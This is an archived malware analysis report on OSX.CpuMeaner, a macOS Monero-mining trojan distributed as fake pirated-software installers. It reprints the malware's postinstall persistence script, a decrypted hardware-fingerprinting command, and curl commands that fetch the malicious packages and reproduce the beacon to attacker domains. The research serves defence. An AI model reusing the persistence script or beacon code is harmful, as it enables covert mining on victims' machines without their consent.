{
	"id": "89529eb3-b686-48c2-b6ac-b55787577f3b",
	"created_at": "2026-04-06T00:15:02.670285Z",
	"updated_at": "2026-04-10T03:20:42.53812Z",
	"deleted_at": null,
	"sha1_hash": "2bd6a12475b16af3d0d04441fcf1d56d96ab774e",
	"title": "OSX.CpuMeaner: New Crypto Mining Trojan Targets macOS",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1474429,
	"plain_text": "OSX.CpuMeaner: New Crypto Mining Trojan Targets macOS\r\nBy Arnaud Abbati\r\nPublished: 2017-11-28 · Archived: 2026-04-05 21:24:48 UTC\r\n(Image source: Beware of traps, by Carmen)\r\nIn this post, we analyze a new cryptocurrency mining trojan targeting macOS. The malware hides in the pledge to\r\ndownload pirated applications and secretly mines Monero crypto-currency with the user’s hardware.\r\nWhile the idea is similar to OSX.Pwnet, the means and method of implementation are closer to that of the adware\r\nindustry.\r\nInfection\r\nIndividuals using pirated software could end up with malware from a variety of sources including a simple\r\nGoogle search and a YouTube video with a malicious link in its description. In the middle of technical support\r\nscams, fake Flash players, and recommended virus scans, the victim could end up with a malicious package. The\r\ninstance below shows a user looking for a crack of Sketch app:\r\n$ curl -svJO http://jumpcash.xyz/download.php -G -d e=pkg -d tag=mosx3 -d clickid=2305343 -d key=\"Ske\r\n* Trying 46.30.45.236...\r\n* Connected to jumpcash.xyz (46.30.45.236) port 80 (#0)\r\n\u003e GET /download.php?e=pkg\u0026tag=mosx3\u0026clickid=2305343\u0026key=Sketch 47 Crack HTTP/1.1\r\nhttps://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/\r\nPage 1 of 11\n\n\u003e Host: jumpcash.xyz\r\n\u003e User-Agent: curl/7.43.0\r\n\u003e Accept: */*\r\n\u003e\r\n\u003c HTTP/1.1 200 OK\r\n\u003c Server: nginx/1.4.6 (Ubuntu)\r\n\u003c Date: Tue, 14 Nov 2017 10:19:17 GMT\r\n\u003c Content-Type: application/octet-stream\r\n\u003c Content-Length: 169267\r\n\u003c Connection: keep-alive\r\n\u003c X-Powered-By: PHP/5.5.9-1ubuntu4.21\r\n\u003c Content-Description: File Transfer\r\n\u003c Content-Disposition: attachment; filename=Sketch_47_Crack-2305343-823868397374412531.pkg\r\n\u003c Content-Transfer-Encoding: binary\r\n\u003c Expires: 0\r\n\u003c Cache-Control: must-revalidate\r\n\u003c Pragma: 
public\r\n\u003c\r\n{ [936 bytes data]\r\n* Connection #0 to host jumpcash.xyz left intact\r\n$ shasum -a 256 Sketch_47_Crack-2305343-823868397374412531.pkg\r\n7a6cc593a8fb2853b817013e28681fa1698fd59d0cea69ba06b7a4b6dc3d5c80 Sketch_47_Crack-2305343-82386839737\r\nThe destination filename is generated using the  key  and the  clickid  queries. Of course, the downloaded\r\npackage doesn’t contain any pirated software:\r\nThe threat was also spotted on a French fake torrent site:\r\nA few users complained about installed executables, xmemapp and cpucooler, on Apple forums. According\r\nto VirusTotal, the threat is in the wild, with a detection ratio of 0, since the second half of September 2017.\r\nPackage analysis\r\nAt the time of writing, 3 packages were available on the server:\r\n$ for tag in mosx{1,2,3} ; do curl -s -o $tag.pkg http://jumpcash.xyz/download.php -G -d e=pkg -d tag\r\n$ shasum -a 256 mosx*.pkg\r\nd15a51bb1a88a8906a997a0d4c0d3fb35ddd64b722af23120600eeea989ecef9 mosx1.pkg\r\nc3c0da504e40359ce8247b912cbff00cbd32a2222cb53a6bd30f2e44f7781049 mosx2.pkg\r\n7a6cc593a8fb2853b817013e28681fa1698fd59d0cea69ba06b7a4b6dc3d5c80 mosx3.pkg\r\nThey are all signed using the same developer identity certificate:\r\n$ ls mosx*.pkg | xargs -L 1 pkgutil --check-signature | awk '/Developer ID Installer/'\r\n 1. Developer ID Installer: Artur Nurgaliev (DEWCRD3789)\r\n 1. Developer ID Installer: Artur Nurgaliev (DEWCRD3789)\r\n 1. 
Developer ID Installer: Artur Nurgaliev (DEWCRD3789)\r\nApple revoked the certificate on November 10, 2017:\r\n$ ls mosx*.pkg | xargs -L 1 spctl --assess -v --type install\r\nmosx1.pkg: CSSMERR_TP_CERT_REVOKED\r\nmosx2.pkg: CSSMERR_TP_CERT_REVOKED\r\nmosx3.pkg: CSSMERR_TP_CERT_REVOKED\r\nPackage tagged mosx1 drops  xmemapp , while packages tagged mosx2 or mosx3 drop  cpucooler :\r\n$ for pkg in mosx*.pkg ; do echo $pkg: $(pkgutil --payload-files $pkg | egrep -v -e ^\\.$) ; done\r\nmosx1.pkg: ./xmemapp\r\nmosx2.pkg: ./cpucooler\r\nmosx3.pkg: ./cpucooler\r\nPayload executables don’t have the same hash:\r\n$ for tag in mosx{1,2,3} ; do pkgutil --expand $tag.pkg $tag \u0026\u0026 tar xf $tag/Payload -C $tag ; done\r\n$ shasum -a 256 mosx*/{x,c}*\r\nd196aba4d59b132fc9cd6f6ba627166a8eb6631017636b0ed4df7fd0260524a5 mosx1/xmemapp\r\n47e523a8b796c27b6c0fe91a4781aa7b47c8d66ddb75117d3f3283a6079ff128 mosx2/cpucooler\r\n5c41ab1d3aaa33e021eb73c1a58894df8e679366d2f03663b8f1029a0dc80f26 mosx3/cpucooler\r\nThey are not code-signed:\r\n$ ls mosx*/{x,c}* | xargs -L 1 codesign -dvvv\r\nmosx1/xmemapp: code object is not signed at all\r\nmosx2/cpucooler: code object is not signed at all\r\nmosx3/cpucooler: code object is not signed at all\r\nThey are installed to different locations:\r\n$ for tag in mosx{1,2,3}; do echo $tag: $(xmllint --xpath \"string(//pkg-info/@install-location)\" $tag\r\nmosx1: /Library/Application Support/XMemApp\r\nmosx2: /Library/Application Support/CpuCooler\r\nmosx3: /Library/Application Support/CpuCooler\r\nAfter installation, the package runs its  postinstall  script to:\r\nwrite the launchd.plist file to  /Library/LaunchAgents  for persistence;\r\nload the Launch Agent;\r\nwait 10 seconds and kill all processes with the executable name;\r\nwait 60 seconds in the background and run the executable, with the package name as an argument.\r\nThis is the  postinstall  
script for mosx2 and mosx3 packages:\r\n#!/bin/bash\nIDENTIFIER=\"com.osxext.cpucooler\"\nINSTALL_LOCATION=\"/Library/Application Support/CpuCooler/cpucooler\"\nLAUNCH_AGENT_PLIST=\"/Library/LaunchAgents/$IDENTIFIER.plist\"\necho '?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\nUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\nLabel'$IDENTIFIER'Program'$INSTALL_LOCATION'RunAtLoad' \u003e \"$LAUNCH_AGENT_PLIST\"\nFILENAME=$(basename \"$1\")\n/bin/launchctl load \"$LAUNCH_AGENT_PLIST\"\nsleep 10 \u0026\u0026 sudo pkill cpucooler\nsleep 60 \u0026\u0026 /Library/Application\\ Support/CpuCooler/cpucooler \"$FILENAME\" \u0026\nexit\nExecutable analysis\nxmemapp and cpucooler are custom builds of XMRig version 2.3.1, an open-source Monero CPU miner.\nThe author added functions to de-obfuscate some strings and send feedback to a server:\nPostback::sendPostback(std::string const\u0026);\nUtils::Utils();\nUtils::encdec(std::string);\nUtils::exec(std::string const\u0026);\nUtils::getNumber();\nUtils::hex_to_string(std::string const\u0026);\nUtils::jenkins_one_at_a_time_hash(std::string, unsigned long);\nUtils::str_replace(std::string, std::string const\u0026, std::string const\u0026);\nUtils::~Utils();\nDefault arguments are also set from the main() function. 
The hard-coded options are:\nURL of mining server -o ;\nusername for mining server -u ;\npassword for mining server  -p x ;\r\nsafe adjust threads and av settings for current CPU  --safe ;\r\nnumber of miner threads  -t 2 .\r\nUtils::encdec()  decodes hexadecimal strings using  Utils::hex_to_string()  and decrypts the result with an\r\nXOR  0x4e :\r\n$ strings mosx3/cpucooler | egrep -e ^[[:xdigit:]]+$ -m 5\r\n27213c2b296e633c2a7f6e63397e6e632d6e0f3e3e222b0f060d070a273d250a3c27382b3c6e326e2f39256e69611d2b3c272\r\n243b233e2d2f3d2660363734\r\n23213d367d\r\n3d3a3c2f3a3b23653a2d3e74616136233c603e212122602327202b3c292f3a2b602d2123747a7b7b787e\r\n232f3c3a27202439262b2b3a0e232f2722602d2123\r\n$ ../decrypt_strings.py mosx1/xmemapp mosx{2,3}/cpucooler\r\nDecrypted strings for: mosx1/xmemapp\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\njumpcash.xyz\r\nmosx1\r\nstratum+tcp:\r\njeffguyen@mail.com\r\nDecrypted strings for: mosx2/cpucooler\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\njumpcash.xyz\r\nmosx2\r\nstratum+tcp:\r\njeffguyen@mail.com\r\nDecrypted strings for: mosx3/cpucooler\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\njumpcash.xyz\r\nmosx3\r\nstratum+tcp:\r\nmartinjwheet@mail.com\r\nThese binaries use 2 threads (i.e. 200% of CPU) to mine on MinerGate XMR\r\npool for  jeffguyen@mail.com  (mosx1, mosx2) and  martinjwheet@mail.com  (mosx3) accounts.\r\nWhen executed with real arguments (i.e. by the package  postinstall  script),  main()  looks for a  -  and\r\na  .  
in the first argument (the package name) and, when found, calls the  Postback::sendPostback()  function\r\nwith the substring as a parameter.\r\nPostback::sendPostback()  sends installation data to the decrypted domain name, notably\r\nusing  Utils::getNumber() :\r\n$ curl -A MNR -w \"%{http_code}\" http://jumpcash.xyz/pb.php -G -d t=mosx3 -d mid=2162179746 -d i=23053\r\n200\r\nUtils::getNumber()  runs the decrypted  ioreg  command with  Utils::exec() . The output is hashed\r\nusing Jenkins’s one-at-a-time hash and converted to a decimal representation to be included in the request’s\r\narguments.\r\nUtils::str_replace()  and, ironically,  Utils::jenkins_one_at_a_time_hash()  functions are not used (dead\r\ncode).\r\nMNR2 variants\r\nAfter the  jumpcash.xyz  domain was taken down, it didn’t take long for more variants to appear on other websites.\r\n$ for tag in mosx{2,3,np} ; do curl -s -o $tag.pkg http://storekit.xyz/api/v1/download.php -G -d e=pk\r\n$ shasum -a 256 *.pkg\r\nb6cbc89d0b5a8938c74c1f601a2b7a88b4a3391bf808d2c028885003a16d9b5a mosx2.pkg\r\nf1da940d6f417ef0001595ed816889ecdcacb41a3d6c921b6e039dc30e35ab8a mosx3.pkg\r\n6e0ec2d6754138b5971f417176136a7becfd75359919a8a5a3b4233aeaade9b3 mosxnp.pkg\r\nThe packages use another, soon to be revoked, developer identity:\r\n$ ls mosx*.pkg | xargs -L 1 pkgutil --check-signature | awk '/Developer ID Installer/'\r\n 1. Developer ID Installer: Adam Kortney (9ADZ437492)\r\n 1. Developer ID Installer: Adam Kortney (9ADZ437492)\r\n 1. 
Developer ID Installer: Adam Kortney (9ADZ437492)\r\n$ ls mosx*.pkg | xargs -L 1 spctl --assess -v --type install\r\nmosx2.pkg: accepted\r\nsource=Developer ID\r\nmosx3.pkg: accepted\r\nsource=Developer ID\r\nmosxnp.pkg: accepted\r\nsource=Developer ID\r\nAgain, Apple revoked the certificate on November 22, 2017:\r\nInstalled executables have new names and locations:\r\n$ for pkg in mosx*.pkg ; do echo $pkg: $(pkgutil --payload-files $pkg | egrep -v -e ^\\.$) ; done\r\nmosx2.pkg: ./mxcpu\r\nmosx3.pkg: ./mxzcpu\r\nmosxnp.pkg: ./moszcpu\r\n$ for tag in mosx{2,3,np} ; do pkgutil --expand $tag.pkg $tag \u0026\u0026 tar xf $tag/Payload -C $tag ; done\r\n$ shasum -a 256 mosx*/m*cpu\r\n91b929d2470e3507b5faf5f12adb35046d96777e8b55b28b8e859a30924168b2 mosx2/mxcpu\r\nb636b2cc15925e68c200449d5d78a9e169af379e4e3b007075ded00d777ffdc7 mosx3/mxzcpu\r\n9a8b16f0a44cd63bf525142519b23481d4dcfd84d2dae02a0b0b9cb5caf1c147 mosxnp/moszcpu\r\n$ for tag in mosx{2,3,np}; do echo $tag: $(xmllint --xpath \"string(//pkg-info/@install-location)\" $ta\r\nmosx2: /Library/Application Support/mxcpu\r\nmosx3: /Library/Application Support/mxzcpu\r\nmosxnp: /Library/Application Support/moszcpu\r\nPackages now have a preinstall script to exit with an error code if the machine is already infected by an older\r\nvariant.\r\nHere is the new  postinstall  script workflow:\r\nwrite the launchd.plist file to  /Library/LaunchAgents  for persistence;\r\nexit if the machine is already trojanized;\r\nwrite the package name to  /Library/Application Support/mosxnp/info  file;\r\nload and start the Launch Agent;\r\nwait 5 seconds and check if the executable is running;\r\nif not, wait 30 seconds in the background and run the executable, with the package name as an argument;\r\nsend an installation status request to the server.\r\nThe new executables are now based on XMRig version 2.4.2. Custom functions are similar.  
main()  now reads\r\nthe package name from  /Library/Application Support/mosxnp/info  file.\r\nThey are built for macOS Sierra or higher (10.12+), and crash on lower system versions:\r\n$ uname -v\r\nDarwin Kernel Version 15.6.0: Mon Aug 29 20:21:34 PDT 2016; root:xnu-3248.60.11~1/RELEASE_X86_64\r\n$ ./mxzcpu\r\ndyld: lazy symbol binding failed: Symbol not found: _clock_gettime\r\n Referenced from: /Library/Application Support/mxzcpu/./mxzcpu (which was built for Mac OS X 10.12)\r\n Expected in: /usr/lib/libSystem.B.dylib\r\ndyld: Symbol not found: _clock_gettime\r\n Referenced from: /Library/Application Support/mxzcpu/./mxzcpu (which was built for Mac OS X 10.12)\r\n Expected in: /usr/lib/libSystem.B.dylib\r\nTrace/BPT trap: 5\r\nThis can make sense, as macOS Sierra requires SSE4 enabled processors, and mining is much faster with this\r\ninstruction set.\r\nHere are the decrypted strings:\r\n$ ../decrypt_strings.py mosx*/m*cpu\r\nDecrypted strings for: mosx2/mxcpu\r\nstorekit.xyz\r\nmosx2\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n/Library/Application Support/mxcpu/info\r\nstratum+tcp:\r\njeffguyen@mail.com\r\nDecrypted strings for: mosx3/mxzcpu\r\nstorekit.xyz\r\nmosx3\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n/Library/Application Support/mxzcpu/info\r\nstratum+tcp:\r\nmartinjwheet@mail.com\r\nDecrypted strings for: mosxnp/moszcpu\r\nstorekit.xyz\r\nmosxnp\r\nioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(\"\\\"\", \"\", $4);print $4}'\r\n/Library/Application Support/moszcpu/info\r\nstratum+tcp:\r\n49dP6YfhFHmLWb16jESv8V977cYzbx8zCXz6A7gUh1sn65jQ1eQgUpG9qCs2mfNhVW9Jm86RQpDGTHxokFnutubU6HQCeuN.34c5c\r\nThe variant tagged mosxnp mines on Nanopool XMR pool.\r\nPostback::sendPostback()  now sends installation data to the URI  
/api/v1/pb.php  on the\r\nhost  storekit.xyz  with the User-Agent  MNR2 .\r\nVirusTotal samples\r\nIn mid-November 2017, a couple of packages, tagged mosx3 and mosxnp, reached VirusTotal.\r\nTheir executables,  cpulite  and  mosxnp , are MNR2 variants, but the postinstall script is slightly different.\r\nXMRig dependencies, libuv and libmicrohttpd, are not linked statically: symbols are imported. As the dynamic\r\nlibraries are very likely to be missing on a target machine (Homebrew path), these executables crash at launch:\r\n$ otool -L mosxnp\r\nmosxnp:\r\n /usr/local/opt/libuv/lib/libuv.1.dylib (compatibility version 2.0.0, current version 2.0.0)\r\n /usr/local/opt/libmicrohttpd/lib/libmicrohttpd.12.dylib (compatibility version 56.0.0, current ve\r\n /usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 307.4.0)\r\n /usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1238.0.0)\r\n$ ./mosxnp\r\ndyld: Library not loaded: /usr/local/opt/libuv/lib/libuv.1.dylib\r\n Referenced from: /Library/Application Support/mosxnp/./mosxnp\r\n Reason: image not found\r\nAbort trap: 6\r\nConclusion\r\nThis OSX.CpuMeaner is part of a larger trend of a new class of attacks as secret crypto mining attacks have\r\npopped up on Android, PC, Linux servers, and even Chrome with CoinHive miners. 
The fact is, criminals are\r\nalways looking for ways to monetize infections and although crypto-mining malware isn’t a traditional attack\r\nsuch as exfiltrating passwords and other sensitive data, remotely controlling the device, etc., the incentive is high\r\nand all you need is a little CPU alongside some innocent-looking network communication.\r\nIt is not 100% certain if these attacks will always be viable, but as long as the market continues to explode and\r\npeople are seeing massive ROI for coins like Monero, DASH, etc., we will continue to see these attacks crop up.\r\nSource: https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/"
	],
	"report_names": [
		"osx-cpumeaner-miner-trojan-software-pirates"
	],
	"threat_actors": [],
	"ts_created_at": 1775434502,
	"ts_updated_at": 1775791242,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2bd6a12475b16af3d0d04441fcf1d56d96ab774e.pdf",
		"text": "https://archive.orkl.eu/2bd6a12475b16af3d0d04441fcf1d56d96ab774e.txt",
		"img": "https://archive.orkl.eu/2bd6a12475b16af3d0d04441fcf1d56d96ab774e.jpg"
	}
}